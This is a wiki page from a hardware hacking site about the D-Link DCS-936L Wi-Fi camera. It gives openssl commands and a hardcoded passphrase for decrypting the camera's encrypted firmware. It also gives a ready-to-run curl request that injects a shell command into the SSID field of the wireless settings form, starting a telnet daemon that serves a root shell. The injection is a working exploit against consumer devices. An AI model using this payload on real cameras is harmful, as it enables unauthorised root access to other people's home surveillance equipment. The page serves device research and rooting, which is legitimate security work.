DLink 936L

From Exploitee.rs
Jump to: navigation, search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

DLINK 936L.jpg

DLink DCS-936L

The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that easily captures your entire room, wall-to-wall, in high-quality 720p. The built-in night vision, motion and sound detection, and a handy mobile app empower you with knowing exactly what is happening, day or night.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the DLink DCS-936L Camera at Amazon

Encrypted Firmware Update

Firmware updates for the DCS-936L are encrypted with AES using a key, which is also encrypted.

After unpacking the firmware package, use the following command to decrypt the AES key:

openssl rsautl -decrypt -in aes.key.rsa -inkey "p.key" -out aes.key

Finally, use the following two commands to decrypt the firmware packages:

openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.aes -out "update" || exit
openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.bin.aes -out "update.bin" || exit

Post Auth Root

Command Injection: Post auth root via arbitrary command injection due to improper sanitization of the SSID field in the wifi configuration form.

curl -i -s -k -v -X 'POST' -H 'Host: 10.255.255.1' \
-H Referer: http://10.255.255.1/eng/admin/adv_wireless.cgi \
-H 'Cookie: language=eng; usePath=null' \
-H 'Authorization: Basic <CREDS>' \
--data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' \
'http://10.255.255.1/eng/admin/adv_wireless.cgi'

Demo